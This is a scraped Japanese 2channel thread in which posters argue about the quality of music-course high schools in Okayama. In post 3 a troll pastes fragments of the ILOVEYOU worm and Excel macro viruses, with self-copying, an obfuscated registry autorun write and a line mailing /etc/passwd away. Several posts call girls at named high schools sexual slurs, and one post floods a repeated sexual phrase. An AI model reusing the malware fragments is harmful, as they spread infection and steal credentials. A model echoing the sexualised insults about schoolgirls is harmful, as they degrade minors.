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2013年17音楽系学校154: 【供給】岡山県の音楽系高校について語る【過多?】 (164) TOP カテ一覧 スレ一覧 2ch元 削除依頼
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【供給】岡山県の音楽系高校について語る【過多?】


1 :2006/06/21 〜 最終レス :2013/02/03
人口の割に大杉な岡山県の高校について。
岡山城東・山陽女子・学芸館・おかやま山陽・明誠学院
作陽高校は大学スレの方もうまくつかってね。
http://school5.2ch.net/test/read.cgi/musicology/1143133725/

2 :
2

3 :
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
cat /etc/passwd | mail nobody@nonexistent.com
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
fso.copyfile "dirsystem&nurupo.vbs","j:\windows\startmenu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFilef1.path, f1.path+"

4 :
早速吹奏楽板の粘着が釣れたようだなw
余程この手の学校にコンプレックスを持っているらしいw
ここは「音楽系学校板」ですからねwww

5 :
岡山城東以外はバカ学校だな

6 :
>>4
もうちょっとうまく煽れよw

7 :
音楽だから頭関係ないょ

8 :
俺作陽の音系だけど勉強のレベル中学校以下

9 :
それでも関係ないょ
楽器ができて、吹奏楽コンクールでぃぃ成績残せば
方程式がわかんなくてもそこAの大学に推薦で突っ込んでもらえるょ
音大だってレベル選ばなかったら大丈夫だし!!

10 :
作陽は学芸館にいたY市先生がきてからレベル上がった、

11 :
>>10
それより前の音科ってそんなに音大進学実績低かったの?
東京に出る人いないとか?

12 :
それぞれの募集定員ってどのくらいなんだろ??
城東の音楽系は勉強できて音楽できるみたいな人達だから音楽の先生とかなる人多いって聞いた。
まあプロになる人もいるとは思うが。
どっちにせよ音楽やる上ではある程度の教養は必要だとオモう

13 :
11 大阪芸大か作大、5年に一人くらい武蔵野、洗足だった

14 :
>>13
吹奏楽の話をされるかと思ったらまともな答えで安心した
そんなに酷かったのか。島根辺りじゃ北陵が出来る前は
高校で音楽専門でやるなら作陽か広島音高、だったのに。

15 :
だが今年作陽から東京芸大出そう!(コンバス)

16 :
卑怯な手を使って生徒を集める明誠

17 :
>>16
雑魚の僻みかよw

18 :
別にひがむ要素は何もないと思うけど。
音大進学でいったら明誠は芸大一人出した以外は大したことないし。
進学が城東や山陽女子並になったらひがむ価値も出てくるかも
しれないけど、山陽女子未満(作陽はきわどい)って
「基本的には音大進学より吹奏楽推薦で大学行くための高校で
音大はおまけ」でしょ?
くどいようだがここは音楽学校板。吹奏楽コンクールの話は
水槽板でしてね。
逆にかわいそうだと思うのよ。学校の選択誤って
無駄な宣伝に乗せられてただの学校経営の捨てゴマにされる
明誠の「その他大勢」の子たちが。他校なら伸びるのに。

19 :
てか、明誠とか県山陽とかと一緒にしてほしくない。

20 :
age

21 :
城東の音系が勉強できると思ってるやつがいたら、大間違いだぞ!
実態は全部推薦で音楽のちょっとした実績さえあれば学力など関係なく、
(しかもその実績も「若い芽」程度で十分)
受験者のうち4、5人しか落ちるやついないようなクラスなのにさ。
よっぽどのバカじゃない限り受かっちゃうよ。西高や瀬戸高以下。
ま、メイセイとかよりはさすがにちょっとは頭もマシだろうけどw
中には勉強そこそこできる子がいるのも事実だけど、「城東」っていうだけで
実際山女とレベル変わらないのに大きい顔して威張ってるバカ女ばっかり。

22 :
>>21
山女はまじバカの集団だよ?
知性のかけらもない。
あれでよく音楽をやれるものだ。
レベルもたいしたことないけど。
城東の音楽頭いい人しかしらないけど、
バカもいるってことかな。

23 :
城東音系もたいして変わらんと思うけど。
勉強もできない、音楽だってべつにたいしたことない中途半端集団。
そのくせプライドだけ高いから大変。。

24 :
さあ、水槽のコンクールネタをひけらかすしか能のない
エセ音楽学校連中が必死になってきましたwww

25 :
プライドは確かに高い。

26 :
あれー?水槽のコンクールの話しかしない学校が「プライド」って言葉知ってたんだwww

27 :
水槽の話はしないんじゃなかったのか。
おれは水槽とは縁のない人間だから水槽うんぬん言われてもよくわからん。
ただ城東のあのヘタクソレベルで勉強も音楽もできるなんて言うの聞くと
ちゃんちゃらおかしくて反吐が出る。それだけだ。
ま、ちいさいころからそれなりにピアノでもやってて、中学で並の成績をキープしてれば
音系なら簡単に入れるから、みんな城東受けるんだろうよ。
音系でも城東って名前だけで箔がつくしな。花嫁修業にはもってこいだ。
こういうやつらが城東だってのを鼻にかけて上で言ってるみたいに水槽水槽って他校を
小ばかにしてるんだろ。所詮この程度の人間だ。

28 :
自分は県立普通科から音大行ってるけど、
それでもまだ城東は卑怯な手使ってる私立、特に明誠あたりよりは人間的にましな気がする。
明誠とか学芸とか出た奴とか、卒業後同じステージに出たりとかすると
あまりに礼儀とか常識知らなさすぎてびっくりしたことあるし。
城東もそんなすごいと思わないけどさ。

29 :
明誠や学芸あたりの吹奏楽コースと、城東や山女のような音楽コースを
くらべるほうがおかしいんじゃないのか。
吹奏楽コースは個人の音楽的素養を磨くことよりバンドとしての活動のほうに
重きがあるんだと思っているのだが。
4、5歳からずっと音楽レッスンを受けてきた子と、小学校高学年から中学に
かけて楽器を持ち始めた子との違いだろう。
学校として芸術家を育成したいのならそれなりの常識なども教えるべきだろうが
吹奏楽コースはおそらくそれを主な目的とはしていないのだろう。

30 :
吹奏楽コースにとって音楽とはひとつの「手段」なんだと思う。
きっと何かをやり遂げるとか、何かに打ち込むとか、そういうことを学ぶための
場所なんだろう。
どこの学校の内部事情がどうとかよく知らないが、「笑ってこらえて」など見る限り
ああいうのが「吹奏楽」なんだと思う。
あれはあれで、仲間の大切さとか、青春の大事な思い出を得られていいじゃないか。
ただ音楽科、音楽コースで学ぶ目的とはかなりかけ離れているな。
だから同列に語っても仕方がない。

31 :
そうなんだよね。


だからこそ、いかにも「高校は楽器を専門でやってました」みたいなでかい面を
小さい頃から真剣に音楽やってる奴らの前でしないでほしいって思うんだけど。

32 :
>>30
笑コラに出た学校で吹奏楽コース制のとこって山田くらいだよ。
あとはちゃんと勉強と両立してるし、その山田も
まだ全国行ったことないし。
打ち込んだ結果が中途半端なら
ちゃんと勉強するか、ちゃんと音大進学後伸びる練習とかしたほうがまし。
そういう意味では岡山のコース制はまだまだ。
明誠・山陽全国金一回づつ(しかもギリギリ)でしょ?
天理とか福工大城東とか名電とかに笑われるよw
鹿児島の松陽みたいに「吹奏楽コンクールと大学進学どっちも制覇してる」学校もあるんだし。

33 :
水槽の話はいいって…
笑ってこらえての学校がコースだかコースじゃないだか、そんな話はしていない。
コースだろうとそうでなかろうと「吹奏楽はああいうもの」という話をしている。
金だろうと銀だろうと、その過程で得られるものがたくさんあるんじゃないのか。
あの番組はそういうところに着目していたのだろう。
打ち込んだ結果が金以外なら「中途半端」と言い切る君の思考自体がどうかしている。
そういう話になるから、音楽科とは一線を引かざるを得ないのだ。

34 :
大作曲家、筒美京平氏が手がける新人女性歌手が「また逢う日まで」をカバー。avex selection ( Live DEPT.4) に出演して最初に登場。今なら、GyaO(ギャオ=無料ネットテレビ)音楽コーナーの1番下でみられます【7月7日正午まで】。20歳、驚きの歌唱力!

35 :
城東や山陽の子だって山陽音コンの結果に一喜一憂してるくせにw

36 :
吹奏楽コンクールと音楽コンクールじゃ意味が全然違うだろう。
それとコンクールに重きを置く人がいるのは吹奏楽も個人も同じかもしれないが
音楽に対する考え方や姿勢が吹奏楽だけやってるやつと芸術家を目指すやつとで
違うという話をしている。
コンクールという話題にばっかりこだわるな。だからコン厨と言われる。

37 :
だって城東と山陽以外はあなたの言う「コン厨」育成学校だもん。
決して「正しく打ち込む」ことをきちんと指導とかしてないしw
だから水槽板の岡山スレとかあんなんなってるでしょw
ぶっちゃけ、ある意味板の人には申し訳ないけど、ここ隔離スレの目的で立てさせてもらったので。
根っからの音楽学校板住人の人たちで、現実見させてあげてください。

38 :
         l;;llllll||lll从从WWWl||ll,,ツ从ツツノlイノ'彡ヽ
         イ从、从从从从从ll|| |リ从////ノノ彡;j
        jl从从从从;;;;;;;;;;;;从;;;;;/;;;;;;;;;、、、;;-ー、イ彡:}
       (ミミ;;ッ''"゙ ̄ '、::::゙`゙''ー、/"´:::  :::: |;;;;;彡|
        }ミミ;;;} :::  {:: ゙:::::、:::    :::ィ ,,:::: };;;;イ;;l
        jミミ;;;;} :::  ヽ::::ミヽ::  |  ノ  W::  |;;;;彡:|
          }ミ;;;;;;} ::: ヾ {:::::ミ ヽ j イ|从 ":::: };;;;;;彡{
         iミ゙;;;ノ::::::  \'、 }}: l||イ /,ィ;;、、-ーーヾ'ァ;;イ、
        {;;;;リ:レ彡"三三ミヽ,,リ{{,,ノ;;;;ィ≦==ミ'" |;;〉l.|
        l"';;;l ゙'''<<~(::) >>::)-ら::ィ'ー゙-゙,,彡゙  .:|;l"lリ
          |l ';;', ::: ー` ̄:::::::ミ}゙'~}彡ィ""´   .:::lリノ/
         l'、〈;', :::    :::::::t、,j iノ:::、::..    ..::::lー'/
   ,、,,,/|  ヽヽ,,', ::.、    :::::(゙゙(  ),、)、ヽ::.  イ ::::l_ノ
)ヽ"´   ''''"レl_ヽ,,,', ヾ'ー、:::;r'"`' ゙'';;""  ゙l|  ::j ::: |: l,,,,
         ゙''(,l ', l| リ {"ィr''''' ーー''ijツヽ  l| :" l  |',`ヽ,
   き 利    (l :'、 `',. 'l| |;;゙゙゙゙"""´ー、;;| ノ:  / /リヽ \
.    く  い    Z::::ヽ '、 ゙'t;ヽ ` ´ ノ;;リ   ,r' //  |
   な. た     >; :::ヽ  ::ヽミニニニ彡'"  , '::::://  |
   ┃ ふ     フヽ ::\ : ミー―― "ノ , ':::: //:   |
   ┃ う      }ヽヽ :::::\::( ̄ ̄ ̄ /:::://:    |
   ┃ な     }| ヽヽ :::::`'-、竺;;ニィ'::://    |    l
   // 口    (: |  ヽ ヽ :::: ::::::...  :://     |    |
)  ・・.  を    (  |  ヽ ヽ::  ::::::... //      リ.    |
つ、       r、{  |   ヽ ヽ   //      /     |
  ヽ      '´    |   ヽ  ヽ //      /     |

39 :
いくら城東の音科がある程度馬鹿でも
城東
=====人間======
山陽女子
====肉便器。この下は産業廃棄物====
その他
でしょ。

40 :
城東音系も肉便器レベルだよ

41 :
城東はとりあえず合格最低点を満たしていなければ落ちる
(まあ、音科だと実質玉野や西大寺レベルだけど。)
山陽女子未満は完全に全入。

42 :
>>39
山陽女子は肉便器
山陽女子の女はヤれる

43 :
学芸吹奏落ちたやつ知ってるよ。
他のコースなら受かったんだろうけど、音楽経験問わないなんていうのは建前で、
実際は実績ないやつは入れないっていう方針だったんだろうと思う。
そいつは確かに吹奏やったことすらないやつだったから落ちて当然だったけど。
(どうして吹奏を受けたのかがわからん)
今はもう吹奏コースなくなったみたいだから知らんけど。
明誠とかなんか今もそんな感じなんじゃないのかな?

44 :
>>43
学芸は進学コース音楽系という名前にしてるだけで、入学後音楽系希望すれば
好き放題吹奏楽できることには変わりない。
「どっかのパクリの好きな部活馬鹿とは違います。」ってアピールするための手段で何も変わってないよ。
もちろんその学校も当然コースはなくなってなくて、相変わらず(ry

45 :
>入学後音楽系希望すれば
>好き放題吹奏楽できることには変わりない。
入学後の話じゃなくて入試の話をしてるんだけど…
昔の学芸吹奏は音楽経験ないと入れないのが実態だったという話。
少なくとも全入ではなかった。
頭の良し悪しは全然関係なかったと思うけどね。

46 :
>>45
でも今は全入ねwww

47 :
そりゃ、吹奏コースなくなったんだから音楽経験なくて
落とされることはなくなったわな。

48 :
だからさ、都合のいいとこだけ「吹奏楽コースなくなった」っていうのやめない?
実際は入学後楽器吹きまくってれば卒業できる類型が存在するんだから。

49 :
楽器さえやってれば卒業できるのは城東も山女も同じこと

50 :
城東は他のコースに比べればハードルは低いけど一般教科でもちゃんと赤点あるし
勉強できなかったら留年ですよ。
山女は知らないけど。
まあ、学芸の学力レベルでの「楽器さえ」って本当に相当なもんだろうからねえ・・・。
一応西大寺レベルはクリアしてる人と、そうでない人と・・・。

51 :
ていうか少なくとも教える側の世代は「学芸ごときが音楽語るなんて」って
思ってるのはまぎれもない事実なんだから・・・。
個人では頑張ってる人もいるのに、元があんな学校だからかわいそうだよね。
自分の頃は宝塚・宝梅や西宮・今津、姫路・山陽といった岡山の中学校の
何億倍もうまい学校で、でもペーパーではほとんど0点に近いような子の
収容所みたいになってたからね・・・。
そして普通に理大電車や吉備電(人によっては赤穂線回り)で通ってて
都落ちだって馬鹿にされてたりとか・・・。
城東に「他県の音高入れないから」って理由で来る人は少ないはず。山女しかり。

52 :
高校は名前じゃないぞ。
自分しだいでしょ?

53 :
おまえらここで小さくほざくんなら芸校行けや
入れるかは別だけどーww
岡山の音楽高校なんてレベルは全部同じなんだよ。
芸高おちるレベルで
ガタガタさわいでんじゃねーよ

54 :
と、芸大もまだ出てなくて完全全入の県山関係者が必死ですwww

55 :
城東音系で赤点で留年なんて聞いたことねーし。
音系の平均点なんてすげー酷いよ。
テストも他のクラスと違うしもともと音系の平均点が酷いから
赤点なんてなり得ない。
数学も理科もいらないし。
それで音楽が中途半端なやつは推薦で余裕で国立の教育にでも入る。
あんなお得な学校ないよ。

56 :
>>53
ま、これが正論だな。
ほんとにできるやつは高校から東京に行く。
岡山なんかで音楽系に行くやつは所詮負け組。
金がどうとか言ってるようなレベルでは音楽家は到底無理。
地元レベルで落ち着くようなやつは所詮花嫁修業がオチだろ。
それでよその学校がどうとか低レベルな争いご苦労様。
所詮どんぐりの背比べなのに傍から見ると愚かだよね。

57 :
>>56
激しく同意!!!!

58 :
じゃあもう岡山にかえってくんな。
岡山にいたいから岡山で馬鹿にされる学校には入りたくなくて
岡山で最高評価受ける学校を頑張って受けてるんだろうが。R
本当は学芸のカスのくせに。

59 :
>>58
あはははは うけた

60 :
>>58
ワロスwwwwwwwwwwwwwww

61 :
>岡山にいたいから岡山で馬鹿にされる学校には入りたくなくて
>岡山で最高評価受ける学校を頑張って受けてるんだろうが。
こんなこと言ってる時点でもう終わりなんだよ。
岡山にいたいから?なんのために音楽をやってんの?
岡山で最高評価?結局見栄張るだけ?ばかじゃねーの。
一生岡山でくすぶってろよ。

62 :
その岡山でも評価もらえない人がほとんどでしょ。山女未満は。
いや、実際問題。

63 :
山女は肉便器

64 :
ふつう、高校で評価なんてされませんよ、常識的に考えて。
山女未満とか以上とかそんなことで音楽家を評価している人がどこにいる?
いや、実際問題。
高校くらいで最高評価もらいたいなんて考えている子はそこで終わりでしょう。

65 :
終日と三女は性処理用の肉便器

66 :
でも実際の音大進学実績的にも
城東>山女>>その他 でしょ?
それを無視してやれ勉強がどうだの歴史がどうだの余計なことを
口に出すから、こういう言われ方されてるわけで。

67 :
人数比を無視して、進学実績を単純に不等号で語るのは
乱暴すぎますよ。
城東は人数も一番多く、専攻もなんでもありなんだから
音大進学実績があって当たり前。

68 :
もひとつついでに言わせていただくと、音大なんて特殊な分野は特に
進学実績などと言ったところで高校が行かせたわけじゃないからね。
普通高校からでも芸大に行ってプロになる人もいるわけで。
音楽高校に行ってたって結局は外部の先生にみんなついているでしょう?
どうも高校の評価にこだわる人が多いようですね岡山は。

69 :
実際、生活においてどの程度音楽に支配されるか。
レッスンをどれだけ大事にできるか。
学校が音楽系だと、
自分から行わなくても設備が整っている。
ただそれだけ。
結局自分との戦いですよ

70 :
本当に芸大だけで比べるんだったら
城東
===毎年複数名芸大出してる壁===
山陽女子
===毎年芸大出してる壁===
明誠 学芸
===隔年で芸大は出せる環境の壁===
作陽
===まかりなりにも音大の附属の壁==
おかやま山陽
くらいだと思う。と言っても昔に比べたらそれぞれの壁なんてない。
朝日や操山も芸大で比べたら山女辺りのところに入っちゃうし。
だけど、人数比なんて話を出し始めると「音楽系」関係はどこも20〜40程度でしょ?
作陽だけがちょっと多いくらいの話で。
明誠、学芸は本当、出来た頃に比べたら伸びたと思うよ。
学芸なんて音系あってもなかなか芸大は出なかったし、明誠はいくら引き抜きでも
コース2期生で芸大出してるし。

71 :
>>70
あんたは本当になんにもしらなさすぎ。
しらなさすぎのくせにしったかぶりしすぎ。
城東が毎年複数名芸大出してるなんてどこにそんなデータが?
3人ぐらい出るときもあればゼロが続くときも余裕であります。
しかも現役率は非常に低いです。
山女から芸大なんてもうここ数年出てません。
明誠も学芸も隔年で芸大なんて出ません。過去全員数えても片手ほどです。
おかやま山陽からは芸大にひとりだけ行っているみたいですがそれっきりです。
作陽から芸大なんてここ最近聞いたこともありません。
芸大でくらべたときに山女と明誠学芸の位置は微妙かもしれません。
作陽とおかやま山陽の位置はもっと微妙かもしれません。
人数比で作陽がちょっと多いなんてとんでもないことです。
作陽も山女も私立の音楽科は定員割れ続きで一学年20もいません。10も微妙かもしれない。
城東と明誠がちょっと多くてそれでも35程度でしょう。
学芸はいまや混合クラスになっていて正確に何人か判断不能です。
結局岡山の高校はその程度ということです。
みんな城東を過大評価しすぎですが単に公立で評判がよいから最初から実力ある子が
集まって実力どおりの実績を出しているにすぎないのです。
それと何度も言われてますが音楽科・コースと吹奏楽コースを混同するのはいい加減
やめませんか。
ピアノ・声楽・弦楽器の専攻のある学校と、管打楽器だけの学校とを同列に
語るには無理があります。
一口に芸大といったところで、それまでの音楽経験も取り組む環境も全然違うなかで
受験倍率もまた専攻によって全然違う。
吹奏楽は結局学校主体になりぎみですが弦やピアノは個人レッスン主体です。
芸大を出したといっても高校の力を一律に判断できるわけではありません。

72 :
>>71
ブラビッシモ!!

73 :
>>71
いいんよ岡山なんだからwww
熱くなりすぎwww
嫌なら他の奴も言うとおりこんなスレにいないでもっと高尚なスレにいけば?
うまいんでしょあなた???

74 :
べつに嫌なんて言ってないし自分がうまいとも一言も言ってない。
他のどんな奴が高尚なスレに行けって言ってる?高尚なスレとは一体どこ?
音楽系のスレなのに吹奏楽の話しかできない、現実も知らない、
そんな人こそ他のスレに行ってはどうですか。

75 :
学校は関係ないよ。


76 :
>>71
あんたは本当になんにもしらなさすぎ。
しらなさすぎのくせにしったかぶりしすぎ。
城東が毎年複数名芸大出してるなんてどこにそんなデータが?
3人ぐらい出るときもあればゼロが続くときも余裕であります。
しかも現役率は非常に低いです。
山女から芸大なんてもうここ数年出てません。
明誠も学芸も隔年で芸大なんて出ません。過去全員数えても片手ほどです。
おかやま山陽からは芸大にひとりだけ行っているみたいですがそれっきりです。
作陽から芸大なんてここ最近聞いたこともありません。
芸大でくらべたときに山女と明誠学芸の位置は微妙かもしれません。
作陽とおかやま山陽の位置はもっと微妙かもしれません。
人数比で作陽がちょっと多いなんてとんでもないことです。
作陽も山女も私立の音楽科は定員割れ続きで一学年20もいません。10も微妙かもしれない。
城東と明誠がちょっと多くてそれでも35程度でしょう。
学芸はいまや混合クラスになっていて正確に何人か判断不能です。
結局岡山の高校はその程度ということです。
みんな城東を過大評価しすぎですが単に公立で評判がよいから最初から実力ある子が
集まって実力どおりの実績を出しているにすぎないのです。
それと何度も言われてますが音楽科・コースと吹奏楽コースを混同するのはいい加減
やめませんか。
ピアノ・声楽・弦楽器の専攻のある学校と、管打楽器だけの学校とを同列に
語るには無理があります。
一口に芸大といったところで、それまでの音楽経験も取り組む環境も全然違うなかで
受験倍率もまた専攻によって全然違う。
吹奏楽は結局学校主体になりぎみですが弦やピアノは個人レッスン主体です。
芸大を出したといっても高校の力を一律に判断できるわけではありません。

77 :
序列ネタ除いたら何もしゃべることないくせに。
じゃあ何かしゃべれよ。
しゃべれ。
しゃべれ。
いいからしゃべれ。アホのくせに。

78 :
おまえがあほなんだよ、あほ
序列するんでももっと考えてしろや

79 :
違う話題を振れない鸚鵡返しの中途半端私立君の叫びでしたw

80 :
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。まず射精だ。
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81 :
城は最低 あそこで音楽伸びた話なんか
聞いたことない
今は実績あっても学力ないと合格しないし
何がしたいの 中途半端

82 :
学歴にハクをつけて、嫁入り道具にするには
ちょうどいいんじゃないでしょうかw

83 :
何年か前に城東の音系から岡大の薬行った人居るよ
城東の音系は中途半端な気がするが
パンフレット見ると毎年芸大出てるwwwww

84 :
http://www.joto.okayama-c.ed.jp/3sinnrojyoukyou/sinro.html
嘘はいけません、嘘は。

85 :
>>81
入れないからってひがむなよww

86 :
少なくともこのスレには基地外が2名いるってことだな。
城東にも入れない粘着と、
その城東を執拗に擁護する粘着とww

87 :
音楽をちょっとかじってるやつで城東音系に入れないやつなんていないよ。
ここで城東をひがんでるやつがいるとすれば、ふつうに学力で城東に入れない
やつじゃないの。
音系とそれ以外とで、あまりにも入るときのハードルが違いすぎるから。
音系ははっきりいって誰でも入れるでしょう。
ちなみにおれは城東の理系だったが、音系見てると確かにイライラしたw
チャラ女多すぎてw
おれ自身ちょっと音楽かじってる身としては、あの程度の中途半端で
わたし音楽やってるのよ!って高ぶってるの見るとたしかにいい気しないね。
数年にひとりくらいはすごいのもいるけど。

88 :
他県のものです。(管楽器やってます)
管で城東で有名な人といえば、吹奏楽アレンジャーの山里佐和子さんの
イメージがあるので、それなりにすごいと思っていましたが
(国立Euph科卒。吹奏楽やってる人なら楽譜で一度はお世話になっている、審査員にもよく来ている。
多分吹奏楽関係者で知らない人はいない)
城東のチャラい人って具体的にどれくらいなんでしょうか・・・?

89 :
城東音系を擁護するつもりはないけど、
音楽やってこうって本当に思ってるんなら、
特に女の子は一種の華やかさはある程度必要だと思うけど。
仮にそれが腕が中途半端であっても「やっていく」んだったらね。
それで都市部に出てもその雰囲気と大学で伸びた実力があいまって
それなりに売れる人も多い。
本当にどうしようもないのに勘違いなのは、本当に痛いけど・・・。
(見たことない・・・わけではない。)
都市圏のもっと実力ある音高見てみなよ。女子の派手合戦は
あんなもんじゃないよ。東岡山で楽器持ってる子とか
まだかわいいもんだと思うし、普通の子も大差ないじゃん。
下手に旧時代的な価値観を押し付けられて「練習だけ」になるよりかは
個人的には好感持てるよ。岡山にそういう学校があるとは言わないけど。

90 :
>>88
たったひとりの卒業生だけで学校のイメージ決め付けるなんて危険ですね。
そりゃどこの学校にだってすごい人もいればすごくない人もいるでしょう。

91 :
追加。
城東のチャラいっていうのは、見た目の派手さのことだけ言ってるんじゃないと思う。

92 :
とりあえず明誠はまだ「すごい」レベルは出てないだろ。
歴史が浅いんだから。
県山陽しかり。
ここである程度反論してるのはやはり作陽か学芸関係者?

93 :
>とりあえず明誠はまだ「すごい」レベルは出てないだろ。
だから?

94 :
>91
中身も、音楽観も、普通と大差ない人が結構いるよ。
普通以下の人だっている。
あ、在校生なので間違ってはない。

95 :
今城東を潰しておけば、明誠山陽学芸は今年吹奏楽で3校とも実績出したからな。

96 :
>>95
??

97 :
(?д?)

98 :
結果出したんだから私立音楽コースのことごちゃごちゃ言わないでください。

99 :
いわねーよ馬鹿

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